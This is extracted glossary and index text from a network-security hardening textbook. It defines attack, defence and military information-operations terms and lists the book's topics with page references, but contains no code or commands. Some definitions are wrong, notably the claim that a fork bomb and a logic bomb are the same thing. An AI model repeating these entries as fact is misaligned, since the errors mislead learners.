data driven attackA form of attack that is encoded in seem-ingly innocuous data which is executed bya user or a process to implement an attack.A data driven attack is a concern forfirewalls, since it may get through thefirewall in data form and launch an attackagainst a system behind the firewall.

GLOSSARY

552 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 606: SCNP Hardening

defensive information operationsA process that integrates and coordinatespolicies and procedures, operations, person-nel, and technology to protect informationand defend information systems. Defensiveinformation operations are conductedthrough information assurance, physicalsecurity, operations security, counter-deception, counter-psychologicaloperations, counter-intelligence, electronicprotect, and special information operations.Defensive information operations ensuretimely, accurate, and relevant informationaccess while denying adversaries theopportunity to exploit friendly informationand information systems for their ownpurposes.

demon dialerA program which repeatedly calls the sametelephone number. This is benign andlegitimate for access to a BBS but mali-cious when used as a denial of serviceattack.

Denial of ServiceAction(s) which prevent any part of an AISfrom functioning in accordance with itsintended purpose.

derfThe act of exploiting a terminal whichsomeone else has absent-mindedly leftlogged on.

DES(Data Encryption Standard) Definition 1:An unclassified crypto algorithm adoptedby the National Bureau of Standards forpublic use. Definition 2: A cryptographicalgorithm for the protection of unclassifieddata, published in Federal Information Pro-cessing Standard (FIPS) 46. The DES,which was approved by the National Insti-tute of Standards and Technology (NIST),is intended for public and government use.

DII(Defense Information Infrastructure) Theshared or interconnected system of comput-ers, communications, data applications,security, people, training, and other supportstructures serving DoD local, national, andworldwide information needs. DII connectsDoD mission support, command and con-trol, and intelligence computers throughvoice, telecommunications, imagery, video,and multimedia services. It provides infor-mation processing and services to thesubscribers over the Defense InformationSystems Network and includes commandand control, tactical, intelligence, and com-mercial communications systems used totransmit DoD information. (Pending)

DMZ(Demilitarized Zone) A part of the networkthat is neither part of the internal networknor directly part of the Internet. Basically anetwork sitting between two networks.

DNS spoofingAssuming the DNS name of another sys-tem by either corrupting the name servicecache of a victim system, or by compro-mising a domain name server for a validdomain.

EA(Electronic Attack) A division of EWinvolving the use of electromagnetic,directed energy, or antiradiation weapons toattack personnel, facilities, or equipmentwith the intent of degrading, neutralizing,or destroying enemy combat capability. EAincludes actions taken to prevent or reducean enemy’s effective use of the electromag-netic spectrum, such as jamming andelectromagnetic deception and employmentof weapons that use either electromagneticor directed energy as their primary destruc-tive mechanism.

GLOSSARY

Glossary 553

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 607: SCNP Hardening

EP(Electronic Protection) A division of EWinvolving actions taken to protect person-nel, facilities, and equipment from anyeffects of friendly or enemy employment ofEW that degrade, neutralize, or destroyfriendly combat capability.

ES(Electronic Warfare Support) A division ofEW involving actions tasked by, or underdirect control of, an operational com-mander to search for, intercept, identify,and locate sources of intentional and unin-tentional radiated electromagnetic energyfor the purpose of immediate threatrecognition. Thus, electronic warfare sup-port provides information required forimmediate decisions involving EW opera-tions and other tactical actions such asthreat avoidance, targeting, and homing. ESdata can be used to produce signalsintelligence.

ESP(Encapsulating Security Payload) A mecha-nism to provide confidentiality andintegrity protection to IP datagrams.

Ethernet sniffingListening with software to the Ethernetinterface for packets that interest the user.When the software sees a packet that fitscertain criteria, it logs it to a file. The mostcommon criteria for an interesting packet isone that contains words like login orpassword.

EW(Electronic Warfare) Any military actioninvolving the use of electromagnetic anddirected energy to control the electromag-netic spectrum or to attack the enemy. Thethree major subdivisions within electronicwarfare are electronic attack, electronicprotection, and electronic warfare support.

false negativeOccurs when an actual intrusive action hasoccurred but the system allows it to pass asnon-intrusive behavior.

false positiveOccurs when the system classifies an actionas anomalous (a possible intrusion) when itis a legitimate action.

fault toleranceThe ability of a system or component tocontinue normal operation despite the pres-ence of hardware or software faults.

firewallA system or combination of systems thatenforces a boundary between two or morenetworks. A gateway that limits accessbetween networks in accordance with localsecurity policy. The typical firewall is aninexpensive micro-based UNIX box keptclean of critical data, with many modemsand public network ports on it, but just onecarefully watched connection back to therest of the cluster.

fishbowlTo contain, isolate, and monitor an unau-thorized user within a system in order togain information about the user.

Fork BombAlso known as Logic Bomb. Code that canbe written in one line of code on anyUNIX system, used to recursively spawncopies of itself. Eventually ″explodes,″ eat-ing all the process table entries andeffectively locking up the system.

hackerA malicious or inquisitive meddler whotries to discover information by pokingaround. A person who enjoys learning thedetails of programming systems and how tostretch their capabilities, as opposed tomost users who prefer to learn the neces-sary minimum.

GLOSSARY

554 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 608: SCNP Hardening

hackingUnauthorized use, or attempts to circum-vent or bypass the security mechanisms ofan information system or network.

hacking runA hack session extended long outside nor-mal working times, especially one longerthan 12 hours.

hostA single computer or workstation; it can beconnected to a network.

host basedInformation, such as audit data from asingle host which may be used to detectintrusions.

IA(Information Assurance) InformationOperations that protect and defend informa-tion and information systems by ensuringtheir availability, integrity, authentication,confidentiality, and non-repudiation. Thisincludes providing for restoration of infor-mation systems by incorporating protection,detection, and reaction capabilities. (DODDS-3600.1 of 9 Dec 1996)

IDEA(International Data Encryption Algorithm)A private key encryption-decryption algo-rithm that uses a key that is twice thelength of a DES key.

IDIOT(Intrusion Detection In Our Time) A systemthat detects intrusions using pattern-matching.

information securityThe result of any system of policies and/orprocedures for identifying, controlling, andprotecting from unauthorized disclosure,information whose protection is authorizedby executive order or statute.

information superiorityThe capability to collect, process, and dis-seminate an uninterrupted flow ofinformation while exploiting or denying anadversary’s ability to do the same. (DODDS-3600.1 of 9 Dec 1996)

integrityAssuring information will not be acciden-tally or maliciously altered or destroyed.

Internet wormA worm program (see: worm) that wasunleashed on the Internet in 1988. It waswritten by Robert T. Morris as an experi-ment that got out of hand.

intrusionAny set of actions that attempts to compro-mise the integrity, confidentiality, oravailability of a resource.

intrusion detectionPertaining to techniques which attempt todetect intrusion into a computer or networkby observation of actions, security logs, oraudit data. Detection of break-ins orattempts either manually or via softwareexpert systems that operate on logs or otherinformation available.

IO(Information Operations) Actions taken toaffect adversary information and informa-tion systems while defending one’s owninformation and information systems.(DODD S-3600.1 of 9 Dec 96)

IP splicing/hijackingAn action whereby an active, establishedsession is intercepted and co-opted by theunauthorized user. IP splicing attacks mayoccur after an authentication has beenmade, permitting the attacker to assume therole of an already authorized user. Primaryprotections against IP splicing rely onencryption at the session or network layer.

GLOSSARY

Glossary 555

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 609: SCNP Hardening

IP spoofingAn attack whereby a system attempts toillicitly impersonate another system byusing IP network address.

IW(Information Warfare) Information Opera-tions conducted during a time of crisis orconflict to achieve or promote specificobjectives over a specific adversary oradversaries. (DODD S-3600.1 of 9 Dec1996)

keyA symbol or sequence of symbols (or elec-trical or mechanical correlates of symbols)applied to text in order to encrypt ordecrypt.

key escrowThe system of giving a piece of a key toeach of a certain number of trustees suchthat the key can be recovered with the col-laboration of all the trustees.

keystroke monitoringA specialized form of audit trail software,or a specially designed device, that recordsevery key struck by a user and every char-acter of the response that the AIS returns toa user system.

LAN(Local Area Network) A computer commu-nications system limited to no more than afew miles and using high-speed connec-tions (2 to 100 megabits per second). Ashort-haul communications system thatconnects ADP devices in a building orgroup of buildings within a few squarekilometers, including workstations, front-end processors, controllers, and servers.

leapfrog attackUse of user ID and password informationobtained illicitly from one host to compro-mise another host. The act of TELNETingthrough one or more hosts in order to pre-clude a trace (a standard crackerprocedure).

letterbombA piece of email containing live dataintended to do malicious things to therecipient’s machine or terminal. UnderUNIX, a letterbomb can also try to get partof its contents interpreted as a shell com-mand to the mailer. The results of thiscould range from amusing to denial ofservice.

Logic BombAlso known as a Fork Bomb. A residentcomputer program which, when executed,checks for a particular condition or particu-lar state of the system which, whensatisfied, triggers the perpetration of anunauthorized act.

mailbombThe mail sent to urge others to send mas-sive amounts of email to a single system orperson, with the intent to crash the recipi-ent’s system.

malicious codeHardware, software, or firmware that isintentionally included in a system for anunauthorized purpose (for example, a Tro-jan Horse).

metricA random variable x representing a quanti-tative measure accumulated over a period.

mimickingSynonymous with impersonation, masquer-ading, or spoofing.

GLOSSARY

556 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 610: SCNP Hardening

Misuse Detection ModelThe system detects intrusions by lookingfor activity that corresponds to knownintrusion techniques or systemvulnerabilities. Also known as rules baseddetection.

mockingbirdA computer program or process that mim-ics the legitimate behavior of a normalsystem feature (or other apparently usefulfunction) but performs malicious activitiesonce invoked by the user.

Multihost Based AuditingAudit data from multiple hosts may beused to detect intrusions or misuse.

nack attackNegative acknowledgment. A penetrationtechnique which capitalizes on a potentialweakness in an operating system that doesnot handle asynchronous interrupts prop-erly, leaving the system in an unprotectedstate during such an attack.

NCSC(National Computer Security Center) Origi-nally named the DoD Computer SecurityCenter, the NCSC is responsible forencouraging the widespread availability oftrusted computer systems throughout theFederal Government. (AF9K_JBC.TXT)(NCSC) With the signing of NSDD-145;the NCSC is responsible for encouragingthe widespread availability of trusted com-puter systems throughout the FederalGovernment.

networkTwo or more machines interconnected forcommunications.

network basedNetwork traffic data along with audit datafrom the hosts used to detect intrusions.

network level firewallA firewall in which traffic is examined atthe network protocol (IP) packet level.

network securityProtection of networks and their servicesfrom unauthorized modification, destruc-tion, or disclosure, and provision ofassurance that the network performs itscritical functions correctly and there are noharmful side effects. Network securityincludes providing for data integrity.

network security officerIndividual formally appointed by a desig-nated approving authority to ensure that theprovisions of all applicable directives areimplemented throughout the life cycle ofan automated information system network.

network weavingAnother name for leapfrogging.

NII(National Information Infrastructure) Thenationwide interconnection of communica-tions networks, computers, databases, andconsumer electronics that makes vastamounts of information available to users.The NII encompasses a wide range ofequipment, including cameras, scanners,keyboards, facsimile machines, computers,switches, compact disks, video and audiotape, cable, wire, satellites, fiber optictransmission lines, networks of all types,monitors, printers, and much more. Thefriendly and adversary personnel who makedecisions and handle the transmitted infor-mation constitute a critical component ofthe NII. (Pending approval in JP 1-02) .

GLOSSARY

Glossary 557

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 611: SCNP Hardening

non-discretionary securityThe aspect of DOD security policy whichrestricts access on the basis of securitylevels. A security level is composed of aread-level and a category-set restriction.For read access to an item of information,a user must have a clearance level greaterthan or equal to the classification of theinformation and also have a category clear-ance, which includes all of the accesscategories specified for the policy.

non-repudiationMethod by which the sender of data is pro-vided with proof of delivery and therecipient is assured of the sender’s identityso that neither can later deny having pro-cessed the data.

open securityEnvironment that does not provideenvironment-sufficient assurance that appli-cations and equipment are protected againstthe introduction of malicious logic prior toor during the operation of a system.

open systems securityProvision of tools for the secureinternetworking of open systems.

operational data securityThe protection of data from either acciden-tal or unauthorized, intentionalmodification, destruction, or disclosure dur-ing input, processing, or output operations.

operations securityDefinition 1) The process of denyingadversaries information about friendlycapabilities and intentions by identifying,controlling, and protecting indicators asso-ciated with planning and conductingmilitary operations and other activities.Definition 2) An analytical process bywhich the US Government and its support-ing contractors can deny to potentialadversaries information about capabilitiesand intentions by identifying, controlling,and protecting evidence of the planningand execution of sensitive activities.

OPSEC(Operations Security) A process of identify-ing critical information and subsequentlyanalyzing friendly actions attendant to mili-tary operations and other activities to a.identify those actions that can be observedby adversary intelligence systems, b. deter-mine indicators hostile intelligence systemsmight obtain that could be interpreted orpieced together to derive critical informa-tion in time to be useful to adversaries, andc. select and execute measures that elimi-nate or reduce to an acceptable level thevulnerabilities of friendly actions.

Orange BookSee Trusted Computer Security EvaluationCriteria.

OSI(Open Systems Interconnection) A set ofinternationally accepted and openly devel-oped standards that meet the needs ofnetwork resource administration and inte-grated network components.

packetA block of data sent over the networktransmitting the identities of the sendingand receiving stations, error-control infor-mation, and message.

GLOSSARY

558 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 612: SCNP Hardening

packet filterInspects each packet for user defined con-tent, such as an IP address, but does nottrack the state of sessions. This is one ofthe least secure types of firewall.

packet filteringA feature incorporated into routers andbridges to limit the flow of informationbased on pre-determined communicationssuch as source, destination, or type of ser-vice being provided by the network. Packetfilters let the administrator limit protocolspecific traffic to one network segment,isolate email domains, and perform manyother functions.

packet snifferA device or program that monitors the datatravelling between computers on a network.

passive attackAttack which does not result in an unau-thorized state change, such as an attackthat only monitors and/or records data.

passive threatThe threat of unauthorized disclosure ofinformation without changing the state ofthe system. A type of threat that involvesthe interception, not the alteration, ofinformation.

PEM(Privacy Enhanced Mail) An IETF standardfor secure electronic mail exchange.

penetrationThe successful unauthorized access to anautomated system.

penetration signatureThe description of a situation or set of con-ditions in which a penetration or systemevents could occur which in conjunctioncan indicate the occurrence of a penetrationin a system.

penetration testingThe portion of security testing in which theevaluators attempt to circumvent the secu-rity features of a system. The evaluatorsmay be assumed to use all system designand implementation documentation, thatmay include listings of system source code,manuals, and circuit diagrams.

perimeter based securityThe technique of securing a network bycontrolling access to all entry and exitpoints of the network. Usually associatedwith firewalls and/or filters.

perpetratorThe entity from the external environmentthat is taken to be the cause of a risk. Anentity in the external environment that per-forms an attack, such as a hacker.

personnel securityThe procedures established to ensure thatall personnel who have access to any clas-sified information have the requiredauthorizations as well as the appropriateclearances.

PGP(Pretty Good Privacy) A freeware programprimarily for secure electronic mail.

phageA program that modifies other programs ordatabases in unauthorized ways; especiallyone that propagates a virus or Trojan horse.

PHFPhone book file demonstration programthat hackers use to gain access to a com-puter system and potentially read andcapture password files.

PHF hackA well-known and vulnerable CGI scriptwhich does not filter out special characters(such as a new line) input by a user.

GLOSSARY

Glossary 559

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 613: SCNP Hardening

phrackerAn individual who combines phonephreaking with computer hacking.

phreak(er)An individual fascinated by the telephonesystem. Commonly, an individual who useshis knowledge of the telephone system tomake calls at the expense of another.

phreakingThe art and science of cracking the phonenetwork.

physical securityThe measures used to provide physical pro-tection of resources against deliberate andaccidental threats.

piggy backThe gaining of unauthorized access to asystem via another user’s legitimateconnection.

Ping of DeathThe use of Ping with a packet size higherthan 65,507. This will cause a denial ofservice.

plaintextUnencrypted data.

Private Key CryptographyAn encryption methodology in which theencryptor and decryptor use the same key,which must be kept secret. This methodol-ogy is usually only used by a small group.

probeAny effort to gather information about amachine or its users for the apparent pur-pose of gaining unauthorized access to thesystem at a later date.

procedural securitySee Administrative Security.

profilePatterns of a user’s activity which candetect changes in normal routines.

promiscuous modeNormally an Ethernet interface reads alladdress information and accepts follow-onpackets only destined for itself, but whenthe interface is in promiscuous mode, itreads all information (sniffer), regardless ofits destination.

protocolAgreed-upon methods of communicationsused by computers. A specification thatdescribes the rules and procedures thatproducts should follow to perform activitieson a network, such as transmitting data. Ifthey use the same protocols, products fromdifferent vendors should be able to commu-nicate on the same network.

prowlerA daemon that is run periodically to seekout and erase core files, truncate adminis-trative log files, nuke lost-and-founddirectories, and otherwise clean up.

proxyA firewall mechanism that replaces the IPaddress of a host on the internal (protected)network with its own IP address for alltraffic passing through it. A software agentthat acts on behalf of a user; typical prox-ies accept a connection from a user, makea decision as to whether or not the user orclient IP address is permitted to use theproxy, perhaps does additional authentica-tion, and then completes a connection onbehalf of the user to a remote destination.

PSYOP(Psychological Operations) Planned opera-tions to convey selected information andindicators to foreign audiences to influencetheir emotions, motives, objective reason-ing, and ultimately the behavior of foreigngovernments, organizations, groups, andindividuals. The purpose of psychologicaloperations is to induce or reinforce foreignattitudes and behavior favorable to theoriginator’s objectives.

GLOSSARY

560 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 614: SCNP Hardening

Public Key CryptographyType of cryptography in which the encryp-tion process is publicly available andunprotected, but in which a part of thedecryption key is protected so that only aparty with knowledge of both parts of thedecryption process can fully communicate.

Red BookSee Trusted Network Interpretation.

reference monitorA security control concept in which anabstract machine mediates accesses toobjects by subjects. In principle, a refer-ence monitor should be complete (in that itmediates every access), isolated frommodification by system entities, andverifiable. A security kernel is an imple-mentation of a reference monitor for agiven hardware base.

replicatorAny program that acts to produce copies ofitself; examples include a program, worm,fork bomb, or virus. It is even claimed bysome that UNIX and C are the symbiotichalves of an extremely successfulreplicator.

retro-virusA retro-virus is a virus that waits until allpossible backup media are infected too, sothat it is not possible to restore the systemto an uninfected state.

rexdThis Unix command is the Sun RPC serverfor remote program execution. This dae-mon is started by inetd whenever a remoteexecution request is made.

risk assessmentA study of vulnerabilities, threats, likeli-hood, loss or impact, and theoreticaleffectiveness of security measures. The pro-cess of evaluating threats andvulnerabilities, known and postulated, todetermine expected loss and establish thedegree of acceptability to systemoperations.

risk managementThe total process to identify, control, andminimize the impact of uncertain events.The objective of the risk management pro-gram is to reduce risk and obtain andmaintain DAA (Designated ApprovingAuthority) approval.

rootkitA hacker security tool that captures pass-words and message traffic to and from acomputer. A collection of tools that allowsa hacker to provide a back door into a sys-tem, collect information on other systemson the network, mask the fact that the sys-tem is compromised, and much more.Rootkit is a classic example of TrojanHorse software. Rootkit is available for awide range of operating systems.

routerAn interconnection device that is similar toa bridge but serves packets or frames con-taining certain protocols. Routers linkLANs at the Network Layer.

routing controlThe application of rules during the processof routing so as to choose or avoid specificnetworks, links, or relays.

RSA AlgorithmRSA stands for Rivest-Shamir-Aldeman. Apublic-key cryptographic algorithm thathinges on the assumption that the factoringof the product of two large primes isdifficult.

GLOSSARY

Glossary 561

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 615: SCNP Hardening

Rules Based DetectionThe intrusion detection system detectsintrusions by looking for activity that cor-responds to known intrusion techniques(signatures) or system vulnerabilities. Alsoknown as Misuse Detection.

samuraiA hacker who hires out for legal crackingjobs, snooping for factions in corporatepolitical fights, lawyers pursuing privacy-rights and First Amendment cases, andother parties with legitimate reasons toneed an electronic locksmith.

SATAN(Security Administrator Tool for AnalyzingNetworks) A tool for remotely probing andidentifying the vulnerabilities of systems onIP networks. A powerful freeware programwhich helps to identify system securityweaknesses.

secure network serverA device that acts as a gateway between aprotected enclave and the outside world.

secure shellA completely encrypted shell connectionbetween two machines protected by a superlong pass-phrase.

securityA condition that results from the establish-ment and maintenance of protectivemeasures that ensure a state of inviolabilityfrom hostile acts or influences.

security architectureA detailed description of all aspects of thesystem that relate to security, along with aset of principles to guide the design. Asecurity architecture describes how the sys-tem is put together to satisfy the securityrequirements.

security auditA search through a computer system forsecurity problems and vulnerabilities.

security countermeasuresCountermeasures that are aimed at specificthreats and vulnerabilities or involve moreactive techniques as well as activities tradi-tionally perceived as security.

security domainsThe sets of objects that a subject has theability to access.

security featuresThe security-relevant functions, mecha-nisms, and characteristics of AIS hardwareand software.

security incidentAny act or circumstance that involves clas-sified information that deviates from therequirements of governing securitypublications. For example, compromise,possible compromise, inadvertent disclo-sure, and deviation.

security kernelThe hardware, firmware, and software ele-ments of a Trusted Computing Base thatimplement the reference monitor concept.It must mediate all accesses, be protectedfrom modification, and be verifiable ascorrect.

security labelPiece of information that represents thesensitivity of a subject or object, such asits hierarchical classification (CONFIDEN-TIAL, SECRET, TOP SECRET) togetherwith any applicable non-hierarchical secu-rity categories (such as sensitivecompartmented information or criticalnuclear weapon design information).

security levelThe combination of a hierarchical classifi-cation and a set of non-hierarchicalcategories that represents the sensitivity ofinformation.

GLOSSARY

562 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 616: SCNP Hardening

security officerThe ADP official having the designatedresponsibility for the security of an ADPsystem.

security perimeterThe boundary where security controls arein effect to protect assets.

security policiesThe set of laws, rules, and practices thatregulate how an organization manages, pro-tects, and distributes sensitive information.

security policy modelA formal presentation of the security policyenforced by the system. It must identify theset of rules and practices that regulate howa system manages, protects, and distributessensitive information.

security requirementsTypes and levels of protection necessaryfor equipment, data, information, applica-tions, and facilities.

security serviceA service, provided by a layer of commu-nicating open systems, which ensuresadequate security of the systems or of datatransfers.

security violationAn instance in which a user or other per-son circumvents or defeats the controls of asystem to obtain unauthorized access toinformation contained therein or to the sys-tem itself.

serverA system that provides network servicesuch as disk storage and file transfer, or aprogram that provides such a service. Akind of daemon that performs a service forthe requester, which often runs on a com-puter other than the client machine.

Signaling System 7 (SS-7)A protocol used by phone companies. Hasthree basic functions: supervising, alerting,and addressing. Supervising monitors thestatus of a line or circuit to see if it isbusy, idle, or requesting service. Alertingindicates the arrival of an incoming call.Addressing is the transmission of routingand destination signals over the network inthe form of dial tone or data pulses.

SIO(Special Information Operations) Informa-tion Operations that, by their sensitivenature, due to their potential effect orimpact, security requirements, or risk to thenational security of the United States,require a special review and approvalprocess. (DODD S-3600.1 of 9 Dec 96)

skipjackAn NSA-developed encryption algorithmfor the Clipper chip. The details of thealgorithm are unpublished.

smurfingA denial of service attack in which anattacker spoofs the source address of anecho-request ICMP (ping) packet to thebroadcast address for a network, causingthe machines in the network to respond enmasse to the victim.

snarfTo grab a large document or file for thepurpose of using it with or without theauthor’s permission.

sneakerAn individual hired to break into places inorder to test their security; analogous totiger team.

GLOSSARY

Glossary 563

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 617: SCNP Hardening

snifferA program to capture data across a com-puter network. Used by hackers to captureuser ID names and passwords. Softwaretool that audits and identifies network traf-fic packets. Is also used legitimately bynetwork operations and maintenance per-sonnel to troubleshoot network problems.

SNMP(Simple Network Management Protocol)Software used to control network commu-nications devices using TCP/IP.

spamTo crash a program by overrunning afixed-site buffer with excessively largeinput data. Also, to cause a person ornewsgroup to be flooded with irrelevant orinappropriate messages.

SPI(Secure Profile Inspector) A network moni-toring tool for UNIX, developed by theDepartment of Energy.

spoofingPretending to be someone else. The delib-erate inducement of a user or a resource totake an incorrect action. Attempt to gainaccess to an AIS by pretending to be anauthorized user. Impersonating, masquerad-ing, and mimicking are forms of spoofing.

SSL(Secure Sockets Layer) A session layer pro-tocol that provides authentication andconfidentiality to applications.

subversionOccurs when an intruder modifies theoperation of the intrusion detector to forcefalse negatives to occur.

SYN FloodWhen the SYN queue is flooded, no newconnection can be opened.

TCB(Trusted Computing Base) The totality ofprotection mechanisms within a computersystem including hardware, firmware, andsoftware, the combination of which areresponsible for enforcing a security policy.A TCB consists of one or more compo-nents that together enforce a unifiedsecurity policy.

TCP wrapperA software tool for security which providesadditional network logging, and restrictsservice access to authorized hosts byservice.

TCP/IP(Transmission Control Protocol/Internetwork Protocol) The suite ofprotocols on which the Internet is based.

TCSEC(Trusted Computer System Evaluation Cri-teria) A system that employs sufficienthardware and software assurance measuresto allow its use for simultaneous processingof a range of sensitive or important dataissues.

Term Rule-Based Security PolicyA security policy based on global rulesimposed for all users. These rules usuallyrely on a comparison of the sensitivity ofthe resources being accessed and the pos-session of corresponding attributes of users,a group of users, or entities acting onbehalf of users.

terminal hijackingAllows an attacker, on a certain machine,to control any terminal session that is inprogress. An attack hacker can send andreceive terminal I/O while a user is on theterminal.

GLOSSARY

564 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 618: SCNP Hardening

threatThe means through which the ability orintent of a threat agent to adversely affectan automated system, facility, or operationcan be manifest. A potential violation ofsecurity.

threat agentMethods and things used to exploit a vul-nerability in an information system,operation, or facility; fire, natural disasterand so forth.

threat assessmentProcess of formally evaluating the degreeof threat to an information system anddescribing the nature of the threat.

tigerA software tool which scans for systemweaknesses.

tiger teamGovernment- or industry-sponsored team ofcomputer experts who attempt to breakdown the defenses of computer systems inan effort to uncover, and eventually repair,holes in the security.

tinkerbell programA monitoring program used to scan incom-ing network connections and generate alertswhen calls are received from particularsites, or when logins are attempted.

topologyThe map or plan of the network. Thephysical topology describes how the wiresor cables are laid out, and the logical orelectrical topology describes how the infor-mation flows.

trace packetIn a packet-switching network, a uniquepacket that causes a report of each stage ofits progress to be sent to the network con-trol center from each visited systemelement.

tracerouteAn operation of sending trace packets fordetermining information; traces the route ofUDP packets for the local host to a remotehost. Normally traceroute displays the timeand location of the route taken to reach itsdestination.

tranquillityA security model rule stating that the secu-rity level of an active object cannot changeduring the period of activity.

tripwireA software tool for security. Basically, itworks with a database that maintains infor-mation about the byte count of files. If thebyte count has changed, it will identify itto the system security manager.

Trojan HorseAn apparently useful and innocent programcontaining additional hidden code whichallows the unauthorized collection, exploi-tation, falsification, or destruction of data.

Trusted Network InterpretationThe specific security features, assurancerequirements, and rating structure of theOrange Book as extended to networks ofcomputers ranging from isolated LANs toenterprise level.

TTY watcherA hacker tool that allows hackers witheven a small amount of skill to hijackterminals. It has a GUI interface.

vaccineProgram that injects itself into an execut-able program to perform a signature checkand warns if there have been anyinfections.

virusA program that can “infect” other pro-grams by modifying them to include apossibly evolved copy of itself.

GLOSSARY

Glossary 565

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 619: SCNP Hardening

vulnerabilityHardware, firmware, or software flow thatleaves an AIS open for potentialexploitation. A weakness in automated sys-tem security procedures, administrativecontrols, physical layout, internal controls,and so forth, that could be exploited by athreat to gain unauthorized access to anAIS.

vulnerability analysisSystematic examination of an AIS or prod-uct to determine the adequacy of securitymeasures, identify security deficiencies,provide data from which to predict theeffectiveness of proposed security mea-sures, and confirm the adequacy of suchmeasures after implementation.

WAIS(Wide Area Information Service) AnInternet service that allows you to search alarge number of specially indexeddatabases.

WAN(Wide Area Network) A physical or logicalnetwork that provides capabilities for anumber of independent devices to commu-nicate with each other over a commontransmission-interconnected topology ingeographic areas larger than those servedby local area networks.

war dialerA program that dials a given list or rangeof numbers and records those whichanswer with handshake tones, which mightbe entry points to computer or telecommu-nications

wormIndependent program that replicates frommachine to machine across network con-nections often clogging networks andinformation systems as it spreads.

GLOSSARY

566 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 620: SCNP Hardening

6-over-4 interface, 66-67

Aaccess

gaining, 535-537

access control, 183-187

Web server, 449-450

Access Control List

See: ACL

acknowledgement numbers, 17

ACL, 237-240

anti-DoS, 367

anti-Land, 368

anti-spoofing, 368-369

anti-SYN, 367-368

command syntax, 363-364

creating, 359-360

defending against attacks, 367-369

extended syntax, 364-365

implementing, 363-367

logging, 374-376

operation, 360

Active Directory

See: AD

active open connection, 18-20

AD, 237-241

auditing, 285-286

structure, 237-240, 241

administrative access, 258-259

administrative distance, 349-350

administrator account, 255-257

AH

combine with ESP in IPSec, 117-119

configuring, 98-99

Transport mode, 80

Tunnel mode, 80

AH and ESP

in IPSec, 117-119

mismatched policies, 124-125

requiring in IPSec, 122-124

response policy, 127-128

session analysis, 120-122

alert, 216-218

anti-spoofing logging, 374

Apache, 454

ARP process, 334-336

attack, 182-183

hiding evidence, 538

hiding files, 538

OOB, 539

auditing, 276-277, 283-285

authentication, 64-66, 80, 132-134, 325

Authentication Header, 64-66

authentication methods, 246-249

editing policies, 95-96

authorization, 325

availability, 386

Bback door, 483-484

backup

adding data, 405

Cisco routers, 417-419

for Linux, 415-417

hardware, 394-395

incremental, 408-409

initiating, 399-400

options, 395-398

OSs, 391-398

plan, 380

policy, 384

products, 416-417

strategies, 398-399

viewing results, 400-401

week work, 404

weekend work, 402-403

banners, 327-328

basics, 12-13

Bastille, 229-232

using, 230

Berkley Internet Name Domain

See: BIND

binary conversion, 7-8

BIND, 430-432

binding, 191-193

block inheritance, 260

breach, 169-172

broadcast, 14-15

INDEX

Index 567

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 621: SCNP Hardening

browser security, 461-462

browsers

personal information, 476

buffer overflow, 443-444

buffered logging, 372

bug, 322

Ccable modem vulnerabilities, 460-461

captures

displaying, 24-25

CDP, 354-355

certificates, 132-134, 475-476

CGI, 441

Challenge Response authentication, 250

chmod command, 165

CIDR, 13-14

Cisco

backup for routers, 417-419

banners, 328-329

logging, 370

OS, 322

router language, 322

Cisco Discovery Protocol

See: CDP

Classless Interdomain Routing

See: CIDR

Client policy, 83-84

commands

chmod, 165

ipsec6.exe, 69-70

ipv6.exe, 69

ping6.exe, 70-71

umask, 171

Common Gateway Interface

See: CGI

compromise, 229

confidentiality, 64-66

configuration fragments, 324

connection, 18-20

establishing, 18-19

terminating, 19-20

connections

TCP, 33-34

console logging, 371

console password, 325

content rating, 473-474

using, 474-475

contingency plan, 384-385

creating, 385

testing, 385-386

cookies, 460, 473

CORE, 425-426

corrupt data, 412

Council of Registrars

See: CORE

cracking, 173-174

crash, 203-210

cryptography, 79

DDARPA, 194-196

Data Encryption Standard

See: DES

data recovery, 297

DDoS, 431

dead gateway, 314-315

decimal conversion, 7-8

Default Response, 96-98

defaultless core routers, 429

Defense Advanced Research Projects Agency

See: DARPA

denial of host, 365

denial of network, 366

Denial of Service, 314-316

denial of subnet, 366

DES, 84-85

dialup client, 307-308, 312-313

dialup server, 305-306, 311-312

differential backup, 402

restoring data, 406-408

directory permission, 162-166

disabling services, 280-281

disaster recovery, 380-382, 406

distance vector routing, 347

Distributed Denial of Service

See: DDoS

DNS, 241-242, 426-428

INDEX

568 Hardening The Infrastructure (SCP)

DO N

OT

DUPL

ICAT

E

Inst

ruct

or E

ditio

n

Page 622: SCNP Hardening

for Windows 2000, 433-434

installing, 436-437

security, 432-433

spoofing, 433

standard secondary server, 439-440

targeting, 430-432

domain tree, 237-240

DoS, 448-449

performing, 538-539

DSL vulnerabilities, 460-461

dynamic routing, 342-345

EEFS, 296-298

and users, 297

cryptography, 297-298

email

hack attacks, 455-459

message source, 486-487

security, 477-478

enable password, 326

Encapsulating Security Payload

See: ESP

ESP, 64-66

analysis, 114

combine with AH in IPSec, 117-119

encryption, 108-110

Transport mode, 80

Tunnel mode, 80

ESP IPSec session, 113

Ethereal, 28-29

GUI, 29-33

Ethernet interfaces, 67

event files

clearing, 538

Event IDs, 291

event logs, 294-295

Event Viewer, 295

managing, 288-290

executables

securing, 281-283

Ffault tolerance, 426-428

